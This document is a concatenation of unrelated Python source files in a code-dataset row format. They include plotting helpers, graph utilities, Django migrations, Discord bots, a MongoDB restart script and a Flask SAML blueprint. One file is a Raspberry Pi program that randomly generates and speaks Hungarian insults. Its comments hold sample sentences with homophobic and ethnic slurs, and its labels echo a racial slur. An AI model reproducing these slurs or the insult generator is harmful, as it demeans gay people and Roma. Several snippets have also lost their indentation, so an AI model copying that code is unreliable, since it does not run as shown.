from PIL.JpegImagePlugin import JpegImageFile
from PIL import ImageDraw, ImageFont
# Default label font for image annotation (Lato Bold, 20 pt); assumes the
# Debian/Ubuntu lato font package is installed at this path.
font_path = "/usr/share/fonts/truetype/lato/Lato-Bold.ttf"
font = ImageFont.truetype(font_path, size=20)
def barplot(ax, title, labels, legends, *args):
    """Draw one group of side-by-side bars per label; one series per *args*."""
    positions = np.arange(len(labels))
    bar_width = 0.8 / len(args)
    palette = sns.diverging_palette(255, 133, l=60, n=len(legends), center="dark")
    ax.set_title(title)
    ax.set_xticks(positions)
    ax.set_xticklabels(labels)
    # Offsets center the whole group of bars on each tick.
    offsets = np.arange(len(args)) * bar_width
    centering = np.median(offsets)
    for series_idx, series in enumerate(args):
        ax.bar(positions + (offsets[series_idx] - centering), series, bar_width,
               label=legends[series_idx], color=palette[series_idx])
    ax.set_axisbelow(True)
    ax.grid(which='major', axis='y', fillstyle='bottom')
    ax.legend(loc='upper right')
def stacked_bar(ax, title, labels, legends, *args, active_legends=True):
    """Draw a 100%-style stacked bar chart; each series in *args* is one layer.

    Values are assumed to be percentages (0-100) -- TODO confirm; the y tick
    labels are rewritten as "<n>%". When active_legends is true, layers large
    enough to fit a label get their value printed inside the bar.
    """
    r = np.arange(len(labels))
    barWidth = 0.8
    palette = sns.diverging_palette(255, 133, l=60, n=len(legends), center="dark")
    ax.set_title(title)
    ax.set_xticks(r)
    ax.set_xticklabels(labels)
    # Re-label the y axis as percentages.
    yticks = ax.get_yticks()
    ax.set_yticklabels([f"{x*100:.0f}%" for x in yticks])
    # Element-wise sum used to stack layer bottoms.
    calc_bottom = lambda a, b: [i+j for i, j in zip(a, b)]
    # Bottom layer sits directly on the axis.
    ax.bar(r, args[0], width=barWidth, label=legends[0], color=palette[0])
    if active_legends:
        for j, v in enumerate(args[0]):
            if v > 3:
                ax.text(-0.17 + j*1, (v - 8),
                        f"{v:2.2f}%", color='white', fontweight='bold')
    # accumulate() yields args[0], args[0]+args[1], ... -- i.e. the running
    # bottom for layer i (hence enumerate starting at 1).
    for i, bottom in enumerate(accumulate(args[:-1], calc_bottom), 1):
        ax.bar(r, args[i], bottom=bottom, width=barWidth, label=legends[i],
               color=palette[i])
        if active_legends:
            for j, v in enumerate(args[i]):
                if v > 9:
                    ax.text(-0.17 + j*1, (v - 8) + bottom[j],
                            f"{v:2.2f}%", color='white', fontweight='bold')
    ax.legend(loc='lower right')
def sankey(df, height, width, classes_ref, title, pad=5, pos_leg=None):
    """Build a Plotly Sankey figure of the class hierarchy in *df*.

    Links run IdParent -> Id with unit weight. Nodes are labeled with the
    unique class labels from *classes_ref* and colored by the Leaf flag
    (green for leaves, pink for path/internal nodes). When *pos_leg* is
    given as two (x, y) pairs, a small "Leaf"/"Path" legend is annotated
    at those figure coordinates. Returns the Figure (does not show it).
    """
    fig = go.Figure(data=[go.Sankey(
        name='bruno',
        valueformat="",
        valuesuffix="",
        node=dict(
            groups=[[1]]*(classes_ref.Label.nunique() - 1),
            pad=pad,
            thickness=10,
            line=dict(color="black", width=0.5),
            label=classes_ref.sort_values(by=['Id']).Label.unique(),
            # Color by Leaf flag, deduplicated per node Id.
            color=(classes_ref.sort_values(by=['Id'])
                              .drop_duplicates(['Id'])
                              .Leaf
                              .apply(lambda x: "#c8d419" if x else "#f63a76"))
        ),
        link=dict(
            source=df.IdParent.values,
            target=df.Id.values,
            value=np.ones(df.shape[0]),
            color="#ebebeb"))])
    fig.update_layout(title_text=title, font_size=10)
    fig.update_layout(height=height, width=width)
    fig.update_layout(showlegend=True)
    if pos_leg:
        # Hand-placed legend boxes matching the node colors above.
        fig.update_layout(go.Layout(
            annotations=[
                go.layout.Annotation(
                    text='<b>Leaf</b>',
                    align='left',
                    showarrow=False,
                    x=pos_leg[0][0],
                    y=pos_leg[0][1],
                    font=dict(
                        size=12,
                        color='#444444'
                    ),
                    bordercolor='#000000',
                    bgcolor='#c8d419',
                    borderwidth=1
                ),
                go.layout.Annotation(
                    text='<b>Path</b>',
                    align='left',
                    showarrow=False,
                    font=dict(
                        size=12,
                        color='#ffffff'
                    ),
                    x=pos_leg[1][0],
                    y=pos_leg[1][1],
                    bordercolor='#000000',
                    bgcolor='#f63a76',
                    borderwidth=1)]))
    return fig
def show_imgs(imgs, ax_array, df_imgs):
    """Render images on a 2-per-row axes grid, titled with their semantic label."""
    for row_idx, axes_row in enumerate(ax_array):
        for col_idx, ax in enumerate(axes_row):
            record = imgs.iloc[row_idx * 2 + col_idx]
            ref = df_imgs.loc[record.ImageID]
            # Strip ticks/grid so only the image shows.
            ax.set_xticks([])
            ax.set_yticks([])
            ax.grid()
            ax.set_title(f"{record.LabelSemantic.upper()}")
            raw = cv2.imread(ref.Path)
            ax.imshow(cv2.cvtColor(raw, cv2.COLOR_RGB2BGR))
def show_bbox(imgs, ax_array, df_imgs, df_meta, print_others=True):
    """Show images at 1/3 scale with bounding boxes.

    All boxes for the image are drawn first (when print_others), then the
    row's own box is drawn last so it is highlighted on top.
    """
    for row_idx, axes_row in enumerate(ax_array):
        for col_idx, ax in enumerate(axes_row):
            meta = imgs.iloc[row_idx * 2 + col_idx]
            ref = df_imgs.loc[meta.ImageID]
            ax.set_xticks([])
            ax.set_yticks([])
            ax.grid()
            short_path = '/'.join(ref.Path.split('/')[2:])
            ax.set_title(f"{meta.LabelSemantic.upper()} - {short_path}")
            raw = cv2.imread(ref.Path)
            scaled = cv2.resize(raw, (int(raw.shape[1]/3), int(raw.shape[0]/3)))
            if print_others:
                for other in df_meta[df_meta.ImageID == meta.ImageID].itertuples():
                    add_bbox(scaled, other)
            add_bbox(scaled, meta, True)
            ax.imshow(cv2.cvtColor(scaled, cv2.COLOR_RGB2BGR))
def add_bbox(img, meta, principal=False):
    """Draw meta's normalized (XMin..YMax) box on img, in place.

    Green for the principal box, yellow otherwise.
    """
    height, width = img.shape[0], img.shape[1]
    corner_a = (int(width * meta.XMin), int(height * meta.YMin))
    corner_b = (int(width * meta.XMax), int(height * meta.YMax))
    box_color = (55, 255, 0) if principal else (255, 210, 0)
    cv2.rectangle(img, corner_a, corner_b, box_color, 2)
def plot_heatmap_corr(df, principal, secondary, figsize):
    """One heatmap column per *principal* value showing the *secondary* distribution."""
    percentages = _create_df_percentage(df, principal, secondary)
    fig, axes = plt.subplots(1, percentages.shape[1], sharey=True, figsize=figsize)
    for idx, col in enumerate(percentages):
        sns.heatmap(percentages[[col]], annot=True, ax=axes[idx],
                    vmin=0, vmax=1, cmap="YlGnBu")
        axes[idx].set_ylim(0, percentages.shape[0])
    # Shared axis captions for the whole figure.
    fig.text(0.5, 0, principal, ha='center', fontsize=14)
    fig.text(0.05, 0.5, secondary, va='center', rotation='vertical', fontsize=14)
    return fig, axes
def _create_df_percentage(df, principal, secondary):
arr = []
principal_values = df[principal].unique()
secondary_values = df[secondary].unique()
for line in principal_values:
total = df[df[principal] == line].shape[0]
for col in secondary_values:
arr.append(df[(df[principal] == line)
& (df[secondary] == col)].shape[0] / total)
arr_aux = np.transpose(np.reshape(arr, (len(principal_values),
len(secondary_values))))
return (pd.DataFrame(arr_aux, columns=principal_values, index=secondary_values)
.sort_index(ascending=True))
def draw_bbox(img, bbox: list,
              gca_axes: SubplotBase = None,
              label: str = None,
              color: str = "#00ffff") -> SubplotBase:
    """Draw one (cx, cy, w, h)-normalized box on *gca_axes* (defaults to plt.gca())."""
    cx, cy, w, h = bbox
    axes = gca_axes if gca_axes else plt.gca()
    img_w, img_h = img.size
    # Rectangle is anchored at the top-left corner in pixel coordinates.
    anchor = ((cx - w/2) * img_w, (cy - h/2) * img_h)
    axes.add_patch(plt.Rectangle(anchor, w * img_w, h * img_h,
                                 color=color, fill=False, linewidth=2))
    font = {'color': 'white',
            'weight': 'bold',
            'size': 16}
    if label:
        axes.text(anchor[0], anchor[1], label,
                  fontdict=font,
                  bbox={'facecolor': '#00abab', 'alpha': 1})
    return axes
def draw_many_bboxes(img, bboxes: np.array,
                     gca_axes: SubplotBase = None,
                     label: np.array = None,
                     color: str = "#00ffff") -> SubplotBase:
    """Draw every row of *bboxes*; *label* may be None, one string, or one per box."""
    if label is None:
        texts = [""] * bboxes.shape[0]
    elif isinstance(label, str):
        texts = [label] * bboxes.shape[0]
    else:
        texts = label
    for box, text in zip(bboxes, texts):
        gca_axes = draw_bbox(img, box, gca_axes, text, color)
    return gca_axes
|
11,048 | 06f14b4423bfd59e092263303e5423468bb7f26c | op = 0
S = "()(())"
a = ""
# Keep only characters strictly inside the outermost parentheses of each
# primitive group, i.e. strip one level of nesting ("()(())" -> "()").
for ch in S:
    keep = (ch == '(' and op > 0) or (ch == ')' and op > 1)
    if keep:
        a += ch
    op += 1 if ch == '(' else -1
print(a)
|
11,049 | 7c47299690bc30c3e8278c68cb838b63faf38be6 |
from ibm_watson import TextToSpeechV1
from ibm_watson.websocket import RecognizeCallback, AudioSource
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
authenticator = IAMAuthenticator('api key goes here')
tts = TextToSpeechV1(authenticator=authenticator)
#Insert URL in place of 'API_URL'
tts.set_service_url('api url goes here')
# recognize text using IBM Text to Speech from txt file
# save TTS as mp3 file
with open('stt-output.txt', 'r') as txt:
text = txt.read()
with open('./tts-output.mp3', 'wb') as audio_file:
res = tts.synthesize(text, accept='audio/mp3', voice='en-US_AllisonV3Voice').get_result()
audio_file.write(res.content) #write the content to the audio file
print("Process completed >> File saved")
|
11,050 | bb28285b6b778ed9b8921f5724105fd151c2871e | from types import SimpleNamespace
from collections import deque
from random import sample
def nedges(G):
    """Number of undirected edges in adjacency-list graph G (each edge stored twice)."""
    return sum(len(neighbors) for neighbors in G) // 2
def removeEdges(G, edges):
    """Delete each undirected edge (u, v) from both adjacency lists of G, in place."""
    for endpoint_a, endpoint_b in edges:
        G[endpoint_a].remove(endpoint_b)
        G[endpoint_b].remove(endpoint_a)
def addEdges(G, edges):
    """Append each undirected edge (u, v) to both adjacency lists of G, in place."""
    for endpoint_a, endpoint_b in edges:
        G[endpoint_a].append(endpoint_b)
        G[endpoint_b].append(endpoint_a)
def bfs(G, s, fun, data):
    """Breadth-first traversal from *s*, calling fun(u, v, marked) on every
    directed edge scanned. Aborts as soon as fun sets data.sentinel."""
    marked = [False] * len(G)
    marked[s] = True
    frontier = deque([s])
    while frontier:
        u = frontier.popleft()
        for v in G[u]:
            fun(u, v, marked)
            if data.sentinel:
                return
            if not marked[v]:
                marked[v] = True
                frontier.append(v)
def nonBridges(G, s, lim):
    """Collect up to *lim* non-tree (cycle-closing) edges found by a BFS from *s*.

    An edge into an already-visited vertex that is not the BFS parent closes
    a cycle, so it cannot be a bridge.
    """
    data = SimpleNamespace(
        sentinel=False,
        edges=set(),
        parent=[None] * len(G)
    )

    def record(u, v, marked):
        if marked[v] and data.parent[u] != v:
            data.edges.add((min(u, v), max(u, v)))
            if len(data.edges) >= lim:
                data.sentinel = True   # stop the BFS early
        elif not marked[v]:
            data.parent[v] = u

    bfs(G, s, record, data)
    return data.edges
def nonEdgesCoro(G, s):
    """Yield non-edges (u, w) of G while BFS-ing from *s*.

    For each dequeued vertex u, the candidate endpoints are visited in a
    random order; neighbors of u are excluded via the `connected` scratch
    array, which is reset as it is scanned.
    """
    n = len(G)
    connected = [False] * n
    marked = [False] * n
    marked[s] = True
    queue = deque([s])
    while queue:
        u = queue.popleft()
        for v in G[u]:
            connected[v] = True
            if not marked[v]:
                marked[v] = True
                queue.append(v)
        for w in sample(range(n), n):
            if connected[w]:
                connected[w] = False      # neighbor: clear for next vertex
            elif w != u:
                yield (min(u, w), max(u, w))
def nonEdges(G, s, lim):
    """Return a set of at most *lim* non-edges discovered from vertex *s*."""
    found = set()
    for candidate in nonEdgesCoro(G, s):
        found.add(candidate)
        if len(found) >= lim:
            break
    return found
|
11,051 | ab56c0b725afbfd09cec7b34ff59fd536ec37cfc | from django.contrib import admin
from scoreboard.models import Team, Competition, Score
# Expose the scoreboard models in the Django admin with default ModelAdmin options.
admin.site.register(Team)
admin.site.register(Competition)
admin.site.register(Score)
|
11,052 | 455ffd2e33b83df55cd837cd004ddff7805a87b4 | # 2022-10-17
# Week 3 - recursion and sorting: "Sort numbers"
# https://www.acmicpc.net/problem/2750
# Time taken: 16:42 ~ 16:43 (1m)
import sys
input = sys.stdin.readline  # faster per-line reads than the builtin input()
N = int(input())
data = [int(input()) for _ in range(N)]
data.sort()
for d in data:
    print(d)
|
11,053 | 97a891df61287c32c90e22a6ae2e19d8c072efc0 | # coding=utf-8
import os
import random
import codecs
import sys
import inspect
import subprocess
import RPi.GPIO as GPIO
import time
# Resolve the source-dictionary directory and the result directory.
# NOTE(review): rel_path is an absolute path, so os.path.join ignores
# script_dir entirely -- confirm this is intended.
script_dir = os.path.dirname(__file__)
rel_path = "/home/pi/Desktop/gyalazo-v5/src/"
dictionarypath = os.path.join(script_dir, rel_path)
script_dir = os.path.dirname(__file__)
rel_path = "/home/pi/Desktop/gyalazo-v5/res/"
resultpath = os.path.join(script_dir, rel_path)
# Discover the word dictionaries (*.txt) under the source directory.
dictnum = 0
dictionaryfiles = []
for r, d, f in os.walk(dictionarypath):
    for file in f:
        if '.txt' in file:
            dictname = (file[0:-4])
            dictionaryfiles.append(dictname)
# Load EVERY dictionary into a module-level list named after its file.
# BUG FIX: the original read block was not inside a loop, so only
# dictionaryfiles[0] was ever loaded (even though dictnum was incremented
# as if looping) and every other word-type list used by rstc() stayed
# undefined.
for dictname in dictionaryfiles:
    dictfile = dictionarypath + dictname + '.txt'
    with codecs.open(dictfile, encoding='latin1') as fp:
        words = []
        line = fp.readline()
        while line:
            words.append(line.strip())
            line = fp.readline()
        vars()[dictname] = words
    dictnum = dictnum + 1  # kept for compatibility: number of dicts loaded
# Random-sentence generator; "pos" is the sequence of part-of-speech tags.
def rstc(pos):
    """Build a sentence from one random word per tag in *pos*, write it to
    result.txt, print it, and speak it with espeak.

    Words drawn from non-protected dictionaries are removed after use so
    they are not repeated across calls.
    """
    uppercase=0
    space=0
    speakout=[]
    wordtype=[]
    # Protected types are never removed from their dictionary (few entries,
    # reused many times).
    protectedwordtypes=["byname", "cm", "conj", "conjand", "gly", "ijt", "pnoun", "qm", "qone", "qthree", "qtwo"]
    needcapitalize=["gly","qm"]  # the next word starts with a capital letter
    needspace=["cm","gly","qm"]  # no space is inserted BEFORE these types
    vowels=["a","á","o","ó","u","ú","e","é","i","í","ö","o","ü","u"]  # Hungarian vowels (article choice)
    for x in range(len(pos)):
        actdictname=pos[x]  # word-type tag
        actdictlen=len(eval(pos[x]))  # size of the matching dictionary list
        actdictarrname=eval(pos[x])
        wordtype.append(actdictname)
        if actdictlen > 0:
            gennum=random.randrange(0, actdictlen, 1)
            actdictval=eval(pos[x])[gennum]  # the chosen word
            speakout.append(actdictval)
            if actdictname not in protectedwordtypes:
                actdictarrname.remove(actdictval)
    # The sentence is staged in result.txt because speaking word-by-word
    # with espeak lags; the whole file is spoken at the end.
    f=open("/home/pi/Desktop/gyalazo-v5/res/result.txt","w")
    for z in range(len(speakout)):  # decide spacing/capitalization per word
        uppercase=0
        space=0
        if z==0 or wordtype[z-1] in needcapitalize:
            uppercase=1
        if z!=0:
            if wordtype[z] not in needspace:
                space=1
        # Pick the Hungarian article based on the next word's first letter.
        if wordtype[z]=="byname":
            nextw=speakout[z+1][:1]
            if str(nextw.encode('utf-8').strip()) in vowels:  # next word starts with a vowel
                speakout[z]=byname[1]  # article used before vowels
            else:
                speakout[z]=byname[0]  # article used before consonants
        if space==1:
            f.write(str(" "))  # separating space
            space=0
        if uppercase==0:  # capitalize the first letter?
            f.write(str(speakout[z].encode('utf-8').strip()))  # no
        if uppercase==1:
            f.write(str(speakout[z].encode('utf-8').capitalize().strip()))  # yes
            uppercase=0
    f=open("/home/pi/Desktop/gyalazo-v5/res/result.txt","r")  # reopen the finished sentence
    contents=f.read()
    print(contents)
    # Speak the file via espeak (Hungarian male voice) in a shell command.
    subprocess.check_output('espeak -vhu+m1 -f /home/pi/Desktop/gyalazo-v5/res/result.txt -p30 -s200 -a100 ', shell=True)
    f.close()
#-------- sucker sentence examples: --------#
# Mi a kurva anyádat nézel te faszkalap? Szájbabaszlak te buzi köcsög! Na takarodj a büdös picsába!
# Mit bámulsz buzigyerek? Szétbaszom a nyűves pofádat te cigány. Húzz a picsába, mert szétfejellek te köcsög.
# Kinek ugatsz te faszkalap? Anyádon rúglak, véged köcsög. Szopd le a faszomat és húzzd el a beled de geci gyorsan, mielőtt szétbaszlak.
#-------- fucking hungarian help: --------#
# adj - melleknev
# byname - nevelo (a, az) ------ [protected]
# cm - comma (,) ----------- [protected]
# conj - conjunction (mert) -- [protected]
# conjand - conjuction and (és) - [protected]
# gly - irasjel (. !) ------- [protected]
# ijt - indulatszo (na) ----- [protected]
# noun - fonev
# nounverb - fonevi igenev
# pnoun - nevmas (te) --------- [protected]
# pverb - igekoto ige
# qm - kerdojel (?) -------- [protected]
# qone - kerdoszo1 (mi) ------ [protected]
# qthree - kerdoszo3 (kinek) --- [protected]
# qtwo - kerdoszo2 (mit) ----- [protected]
# subj - targy
# subjto - noun to
# verb - ige
# Pick one of the predefined sentence structures; the range must match the
# number of structures below (more structures -> less repetitive output).
gennum=random.randrange(0, 8, 1)
if gennum==0:
    rstc(["byname","adj","adj","subj","subj","noun","cm","nounverb","pnoun","subj","gly"]) #shark1
if gennum==1:
    rstc(["qtwo","verb","pnoun","adj","adj","subj","qm","pverb","pnoun","adj","adj","subj","gly"]) #shark2
if gennum==2:
    rstc(["pnoun","adj","adj","subj","cm","pverb","conjand","pverb","pnoun","adj","adj","subj","subj","gly"]) #bnsgt1
if gennum==3:
    rstc(["qtwo","verb","subj","cm","nounverb","byname","subj","subj","subjto","gly"]) #bnsgt2
if gennum==4:
    rstc(["pverb","pnoun","adj","subj","cm","conj","nounverb","pnoun","subj","gly"]) #niga1
if gennum==5:
    rstc(["ijt","pnoun","subj","gly","qone","byname","noun","verb","pnoun","adj","subj","gly"]) #niga2
if gennum==6:
    rstc(["nounverb","pnoun","subj","subj","subj","gly"]) #gandi1
if gennum==7:
    rstc(["qtwo","verb","pnoun","adj","adj","subj","qm"]) #gandi2
# Append which structure was used to the log (for attribution of structures).
fout = open("/home/pi/Desktop/gyalazo-v5/log/log.txt", "a")
fout.write("ver: " + str(gennum) + " | ")
fout.close()
|
11,054 | 9ae534c5e994560ca3b5dda735d7dbdec65fd088 | #!/usr/bin/python
import os
bin_path = os.path.dirname(__file__)
db_path = os.path.join(bin_path, "..", "data")
log_path = os.path.join(db_path, "log")
mongo_bin = os.path.join(bin_path, "mongod")
mongodb_lock = "mongod.lock"
silence = " >/dev/null 2>&1"

def _read_lock_pid():
    # mongod writes its pid into the lock file while it is running.
    # BUG FIX: the Python 2 builtin file() no longer exists; use open()
    # inside a context manager so the handle is always closed.
    with open(os.path.join(db_path, mongodb_lock)) as fh:
        return fh.read().strip()

os.popen('mkdir -p ' + log_path)
try:
    pid = _read_lock_pid()
    print("killing existing mongodb ... pid: " + pid)
    os.popen('kill ' + pid + silence)
except (IOError, OSError):
    # No readable lock file => no running instance.
    print("mongodb instance not existed, ready to start.")
try:
    os.popen(mongo_bin + ' --fork --logpath ' + os.path.join(log_path, 'mongod.log') + \
             ' --dbpath ' + db_path)
    pid = _read_lock_pid()
    print("mongodb started. pid: " + pid)
except (IOError, OSError):
    print("failed to start mongodb")
|
11,055 | 0b8d6be888c613886d89e4ca20ac144d2ff6a3b1 | import discord
from discord.ext import commands, tasks
from aiohttp import ClientSession
import aiosqlite
from sendText import create_embed
import hdate
import datetime
from geopy.geocoders import Nominatim
from tzwhere import tzwhere
class Zmanim(commands.Cog):
    """Cog that stores a per-user location and reports zmanim (halachic times)."""

    def __init__(self, bot):
        self.bot = bot
        self.session = ClientSession(loop=bot.loop)

    async def _save_location(self, user_id, latitude, longitude, timezone, diaspora):
        """Insert-or-update the user's location row in haGaon.db.

        Uses parameterized SQL (the original interpolated values into the
        query string) and guarantees the connection is closed on error.
        """
        db = await aiosqlite.connect("haGaon.db")
        try:
            cursor = await db.cursor()
            await cursor.execute("SELECT user_id FROM main WHERE user_id = ?", (user_id,))
            result = await cursor.fetchone()
            if result is None:
                sql = (
                    "INSERT INTO main(user_id, latitude, longitude, timezone, diaspora) VALUES(?, ?, ?, ?, ?)"
                )
                val = (user_id, latitude, longitude, timezone, diaspora)
            else:
                sql = "UPDATE main SET latitude = ?, longitude = ?, timezone = ?, diaspora = ? WHERE user_id = ?"
                val = (latitude, longitude, timezone, diaspora, user_id)
            await cursor.execute(sql, val)
            await db.commit()
            await cursor.close()
        finally:
            await db.close()

    @commands.command(name="setLocationByCoordinates")
    async def set_location_by_coordinates(self, ctx, latitude, longtiude, timezone, diaspora):
        """DM-only: store explicit coordinates, timezone name, and diaspora flag."""
        if ctx.channel.type is not discord.ChannelType.private:
            await create_embed(ctx, "This command is only for DMs!")
        else:
            await self._save_location(ctx.message.author.id, latitude, longtiude, timezone, diaspora)
            await create_embed(ctx, "Location Set and Saved!")

    @commands.command(name="setLocationByAddress")
    async def set_location_by_address(self, ctx, *address):
        """DM-only: geocode a free-form address and store the resulting location."""
        if ctx.channel.type is not discord.ChannelType.private:
            await create_embed(ctx, "This command is only for DMs!")
        else:
            geolocator = Nominatim(user_agent="HaGaon HaMachane")
            address_str = " ".join(address)
            location = geolocator.geocode(address_str, language="en")
            await create_embed(ctx, "Processing, this will take a second...")
            # tzwhere construction is slow, hence the "processing" notice above.
            tzwhere_obj = tzwhere.tzwhere()
            timezone = tzwhere_obj.tzNameAt(location.latitude, location.longitude)
            # BUG FIX: Israel is NOT part of the diaspora. The original stored
            # the inverse, making hdate compute diaspora zmanim for Israeli
            # addresses and vice versa.
            if "Israel" in location.address:
                diaspora = "False"
            else:
                diaspora = "True"
            print(f"{timezone} {diaspora} {location.raw}")
            await self._save_location(ctx.message.author.id, location.latitude,
                                      location.longitude, timezone, diaspora)
            await create_embed(ctx, "Location Set and Saved!")

    @commands.command(name="zmanim")
    async def getZmanim(self, ctx):
        """Reply with today's zmanim for the caller's stored location."""
        db = await aiosqlite.connect("haGaon.db")
        try:
            cursor = await db.cursor()
            await cursor.execute("SELECT * FROM main WHERE user_id = ?", (ctx.message.author.id,))
            result = await cursor.fetchone()
            if result is None:
                await create_embed(ctx, "Run setLocation first!!")
            else:
                # Row layout: (user_id, latitude, longitude, timezone, diaspora-as-str)
                location = hdate.Location(
                    longitude=float(result[2]),
                    latitude=float(result[1]),
                    timezone=result[3],
                    diaspora=(result[4] == "True"),
                )
                await create_embed(ctx, str(hdate.Zmanim(location=location, hebrew=False)))
            await cursor.close()
        finally:
            await db.close()
def setup(bot):
    """Entry point used by discord.py's load_extension to register this cog."""
    bot.add_cog(Zmanim(bot))
|
11,056 | d58429be84c4b569a399377cecd6b6a681f60fca | # Generated by Django 3.0.4 on 2020-04-20 12:23
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: drops the ``price_sale`` field from shop.Product."""

    dependencies = [
        ('shop', '0004_auto_20200419_0825'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='product',
            name='price_sale',
        ),
    ]
|
11,057 | 809b440dd1fffe1c990ee180a06398c1652346ea | class Solution(object):
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
zero, one, two = 0, 0, len(nums) - 1
while one <= two:
if nums[one] == 0:
nums[zero], nums[one] = nums[one], nums[zero]
zero += 1
one += 1
elif nums[one] == 1:
one += 1
else:
nums[one], nums[two] = nums[two], nums[one]
two -= 1
|
11,058 | 7e9b565cc0b72faa96659aadf428c74e140bf749 | import robloxapi, json
client = robloxapi.client()
groupId = input("Please enter a valid groupId")
wallJSON = json.dumps(client.Group.getWall(groupId))
# BUG FIX: the output file was never closed, so the JSON could be left
# unflushed; a context manager guarantees flush + close even on error.
with open("groupWall.json", "w") as jsonFile:
    jsonFile.write(wallJSON)
11,059 | 077844639c8310253ac5a72fd9e59f1f72e1b858 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Flete, TipoRenta and Usuario tables."""

    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Flete',
            fields=[
                ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
            ],
        ),
        migrations.CreateModel(
            name='TipoRenta',
            fields=[
                ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
                ('dias', models.DateField()),
                ('semanas', models.DateField()),
            ],
        ),
        migrations.CreateModel(
            name='Usuario',
            fields=[
                ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
                ('nombre', models.CharField(max_length=50)),
                ('apellidos', models.CharField(max_length=60)),
            ],
        ),
    ]
|
11,060 | c6131de63fc20da24feb18993e839f7ee39e41bb | import os
from dask.distributed import Client
import distributed
from Tools.condor_utils import make_htcondor_cluster
from dask.distributed import Client, progress
def getWorkers(client):
    """Return the names of all workers that currently have log entries."""
    return list(client.get_worker_logs().keys())
def getAllWarnings(client):
    """Print every WARNING or ERROR record from all workers' logs."""
    logs = client.get_worker_logs()
    for worker in getWorkers(client):
        for entry in logs[worker]:
            # Each entry looks like (level, message).
            if entry[0] in ('WARNING', 'ERROR'):
                print()
                print(" ### Found warning for worker:", worker)
                print(entry[1])
def getFilesNotFound( client ):
    """Collect every xrootd path mentioned in any worker WARNING message.

    Scans each worker's log, and for every WARNING entry extracts the
    whitespace-separated tokens that contain 'xrootd'.  Returns them all
    as a flat list (workers and files are also echoed to stdout).
    """
    allFiles = []
    # Iterate the log dict directly instead of re-fetching the worker list.
    logs = client.get_worker_logs()
    for worker, entries in logs.items():
        for entry in entries:
            if entry[0] == 'WARNING':
                print (worker)
                files = [token for token in entry[1].split() if token.count('xrootd')]
                print ( files )
                allFiles.extend(files)
    return allFiles
# Spin up an HTCondor-backed Dask cluster and connect a client to it.
cluster = make_htcondor_cluster(local=False, dashboard_address=13349, disk = "10GB", memory = "5GB",)
print ("Scaling cluster at address %s now."%cluster.scheduler_address)
# Request 25 workers from the batch system.
cluster.scale(25)
# Persist the scheduler address so other processes can attach to this cluster.
with open('scheduler_address.txt', 'w') as f:
    f.write(str(cluster.scheduler_address))
c = Client(cluster)
|
11,061 | e80e72afffcb05c77016cc8355df70e63c4411aa | import asyncio
import discord
from discord.ext.commands import Bot
from discord.ext import commands
from discord import Color, Embed
import backend.commands as db
from backend import strikechannel
# This command allows players to change their name.
#
# !name [new_name]
#
# This replaces the default nickname changing that Discord provides so
# that their name will also be replaced in the spreadsheet.
class Name(commands.Cog):
    """Cog implementing !name: renames a player everywhere at once.

    Replaces Discord's built-in nickname change so the player's name is
    also rewritten in the #strikes channel messages and in the backend
    spreadsheet (via ``db.change_name``).
    """

    def __init__(self, bot):
        self.bot = bot
        # Channel id of the #strikes channel, taken from backend config.
        self.strike_channel_id = strikechannel
    @commands.command()
    async def name(self, ctx):
        old_name = ctx.author.display_name
        # Strip the leading "!name " (6 characters) to get the new name.
        new_name = ctx.message.content[6:]
        print(old_name)
        print(new_name)
        # This changes their name in the "#strikes" channel
        channel = self.bot.get_channel(self.strike_channel_id)
        # Rewrite every strikes message that mentions the old name.
        async for msg in channel.history(limit=None):
            # Messages are code blocks of "name - strikes" lines.
            text = msg.content.replace("```", "")
            text_lst = text.split("\n")
            d = {}
            for line in text_lst:
                try:
                    name, strikes = line.rsplit(" - ", 1)
                except:
                    # NOTE(review): bare except silently skips any line that
                    # does not match "name - strikes" (e.g. blank lines).
                    continue
                d[name] = int(strikes)
            if old_name in d:
                # Re-key the entry and re-render the whole code block.
                d[new_name] = d[old_name]
                del d[old_name]
                inner_text = ""
                for k, v in d.items():
                    inner_text += f"{k} - {v}\n"
                full_text = f"```\n{inner_text}```"
                await msg.edit(content=full_text)
        # Update the backend record and the Discord nickname last.
        db.change_name(old_name, new_name)
        await ctx.author.edit(nick=new_name)
        await ctx.channel.send("Name Changed!")
def setup(bot):
    # Discord.py extension entry point: registers the cog on the bot.
    bot.add_cog(Name(bot))
|
11,062 | 449adeca7e2b30182d505128625a3779ae24c6e2 | import turtle
# Draw an 8-petal flower with the turtle module.
turtle.hideturtle()
turtle.speed('fastest')
# Disable screen updates while drawing for speed.
turtle.tracer(False)
def petal(radius,steps):
    # A petal is two mirrored 90-degree arcs approximated with `steps` segments.
    turtle.circle(radius,90,steps)
    turtle.left(90)
    turtle.circle(radius,90,steps)
num_petals = 8
steps = 8
radius = 100
for i in range(num_petals):
    # Reset heading, then rotate to this petal's position around the circle.
    turtle.setheading(0)
    turtle.right(360*i/num_petals)
    petal(radius,steps)
# Re-enable updates to show the finished drawing, then keep the window open.
turtle.tracer(True)
turtle.done()
|
11,063 | b2e27f6f56d1517f5400246859a969d2797a5ca2 | # Generated by Django 2.0.4 on 2018-05-19 23:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make News.approved default to False (news require explicit approval)."""

    dependencies = [
        ('journal', '0004_auto_20180519_2343'),
    ]
    operations = [
        migrations.AlterField(
            model_name='news',
            name='approved',
            field=models.BooleanField(default=False),
        ),
    ]
11,064 | 05482089251131e719ea1b5aee9af241371a852d | import os
from flask import Blueprint
from . import views
# SAML2 IdP blueprint: templates live next to this package.
blueprint = Blueprint('flasksaml2idp', __name__, template_folder=os.path.join(os.path.dirname(__file__), 'templates'))
# SSO entry points for the POST and Redirect SAML bindings.
blueprint.add_url_rule('/sso/post', 'saml_login_post', views.sso_entry, methods=['GET', 'POST'])
blueprint.add_url_rule('/sso/redirect', 'saml_login_redirect', views.sso_entry)
# IdP-initiated SSO and the login processing views.
